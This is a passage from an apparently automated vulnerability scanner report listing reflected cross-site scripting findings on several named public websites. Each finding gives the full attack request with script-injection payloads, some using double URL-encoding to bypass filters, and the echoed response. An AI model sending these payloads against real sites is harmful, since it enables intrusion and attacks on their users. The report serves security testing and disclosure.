This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_cs_apps/ajaxProxy.cfm?bean=twitterService&method=buildUtilityTweetHTML998c7<img%20src%3da%20onerror%3dalert(1)>36e6591e379&searchString=commonspot HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.3.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:16:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Pragma: no-cache
Expires: {ts '2011-02-26 18:16:36'}
Content-Type: text/html; charset=UTF-8
Content-Length: 1638


           <script type="text/javascript" src="/ADF/thirdParty/jquery/jquery-1.3.2.js"></script>
           
           
   <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} -->
   <script type='text/javascript' s
...[SNIP]...
</script>
   The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1)>36e6591e379 is not accessible remotely via Ajax Proxy.
3.59. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prchecker.info
Path:   /check_page_rank.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f50"><script>alert(1)</script>1c5367c1276627aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php
Cache-Control: max-age=0
Origin: http://www.prchecker.info
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:34:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...
<form action="/check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae" method="post">
...[SNIP]...
3.60. http://www.prchecker.info/check_page_rank.php [urlo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prchecker.info
Path:   /check_page_rank.php

Issue detail

The value of the urlo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269 was submitted in the urlo parameter. This input was echoed as 82917\" style=x:expression(alert(1)) 363f71d7529b64269 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /check_page_rank.php?action=docheck&urlo=http%3A%2F%2Fcloudscan.us82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269&submit=Check+PR HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php
Cache-Control: max-age=0
Origin: http://www.prchecker.info
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:34:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...
<input type="text" value="http://cloudscan.us82917\" style=x:expression(alert(1)) 363f71d7529b64269" name="urlo" maxlength="200" class="McheckUrl MCmain">
...[SNIP]...
3.61. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24/page-1/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac was submitted in the REST URL parameter 3. This input was echoed as c8e9b</script><script>alert(1)</script>a1374672bac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:55 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14545

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
s.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='24c8e9b</script><script>alert(1)</script>a1374672bac';
</script>
...[SNIP]...
3.62. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-25/page-1/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878 was submitted in the REST URL parameter 3. This input was echoed as 98f92</script><script>alert(1)</script>4b72cc82878 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /Portfolio/Trades-and-Exhibits/id-2598f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:02 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14545

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
s.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='2598f92</script><script>alert(1)</script>4b72cc82878';
</script>
...[SNIP]...
3.63. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-7/page-1/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d was submitted in the REST URL parameter 3. This input was echoed as 4e625</script><script>alert(1)</script>7ccd8e3bb1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /Portfolio/Trades-and-Exhibits/id-74e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:51 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14544

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
cs.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='74e625</script><script>alert(1)</script>7ccd8e3bb1d';
</script>
...[SNIP]...
3.64. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 291e9'-alert(1)-'67bdd5c1b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/print.css291e9'-alert(1)-'67bdd5c1b7a?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-23e31667bc72ad97513a3b9a533cce89"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::print.css291e9'-alert(1)-'67bdd5c1b7a?20101008');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
   
...[SNIP]...
3.65. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adcd'-alert(1)-'6e92d57bec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/screen.css8adcd'-alert(1)-'6e92d57bec8?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-b162fa23d063abe27d39c6c2ca59435b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::screen.css8adcd'-alert(1)-'6e92d57bec8?20101008');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
   
...[SNIP]...
3.66. http://www.watchmouse.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c623'-alert(1)-'83954da49c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en3c623'-alert(1)-'83954da49c1/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:36:45 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-014c46aed482ac19cb678104562d803c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::en3c623'-alert(1)-'83954da49c1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...
3.67. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41203'-alert(1)-'2f529518186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?41203'-alert(1)-'2f529518186=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:36:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-fff3e345c354e49d8e0d897a110c3ceb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?41203'-alert(1)-'2f529518186=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...
3.68. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/api/checkreferrer.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d30'-alert(1)-'ef346e3dbf0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/api/checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-f7f299238f15fb232758e7723cf59eb8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 14505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef=');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encode
...[SNIP]...
3.69. http://www.winamp.com/media-player/en [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.winamp.com
Path:   /media-player/en

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c2b5"%3b5abe0529ac9 was submitted in the REST URL parameter 2. This input was echoed as 5c2b5";5abe0529ac9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media-player/en5c2b5"%3b5abe0529ac9 HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=US

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 46245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
ryCode = "US";
var playerType = "";
var storeUrlGB = "http://shop.winamp.com/store/winamp/en_GB/buy/productID.103591500/quantity.1/ThemeID.1279300";
var storeBundleUrlGB = "null";
var urlLang = "en5c2b5";5abe0529ac9", osDectect = "Windows 7", dispLanguage = "en-us" , pageType = "", winampplayerFull = "http://download.nullsoft.com/winamp/client/winamp5601_full_emusic-7plus_", winampplayerLite = "http://download.nu
...[SNIP]...
3.70. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The value of the ck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e233"><script>alert(1)</script>9397ad22b9d was submitted in the ck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:08 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000E-xzo66v00mxYzIlN4750VL:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...
3.71. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The value of the cm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5090c"><script>alert(1)</script>1a96ced61b8 was submitted in the cm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
